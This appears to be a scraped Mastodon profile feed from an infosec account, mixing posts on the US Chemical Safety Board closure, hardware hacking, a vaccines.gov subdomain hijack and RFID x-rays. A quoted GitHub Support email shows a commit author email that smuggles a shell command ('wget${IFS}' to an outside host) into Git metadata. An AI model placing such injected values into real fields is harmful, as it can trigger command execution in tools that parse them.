Robin Bradshaw

@en4rab@infosec.exchange
125 Followers
303 Following
332 Posts
US Chemical Safety Board to close this year

THE Trump administration plans to close the US Chemical Safety and Hazard Investigation Board (US CSB) this year, sparking fears its loss will erode industrial safety and cost lives.

One oddity seems to be the touchscreen works but only if you haven't plugged in a keyboard
Hmmmmm
Mischief managed!
I think I found the flash, tomorrow's nonsense will be removing secure boot I guess. I'm not sure this fz-a2 is worth the effort.

@q

Formatting may get slightly mangled here, but should be decipherable:

GitHub Support, Jun 11, 2025, 8:17 AM UTC

Hi Ryan,

Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

Author and committer email:

author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

Timestamps:

1668615481 -2456

The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

  • Inspecting how it got into the repository

  • Rewriting history to remove it (if it was part of a PR or forced push)

  • Checking your workflow or scripts for unsafe parsing of Git metadata

Please give this a try and update me on how it goes.

Go look at the U.S. federal vaccines hub -- do it now

ADDING: It's a DNS hack, pointing that .gov subdomain at an AWS site.

Just scroll down a bit. And I'll add, at the moment those pages are NSFW ... only the best people running stuff there now!

https://es.vaccines.gov/

@en4rab made a bunch of x-rays of common RFID tags. They are so crisp and nice.

Look at this #hitag2
You can see all the thin windings of the antenna and the markings on the IC package.

#rfidhack #hacking

My friend Buy it Fix it bought the same X-ray machine as the one I got and did a video about it.
https://www.youtube.com/watch?v=MgT22byFe64
I Bought A Medical X-Ray Machine, and it's AWESOME! (Including Teardown)

YouTube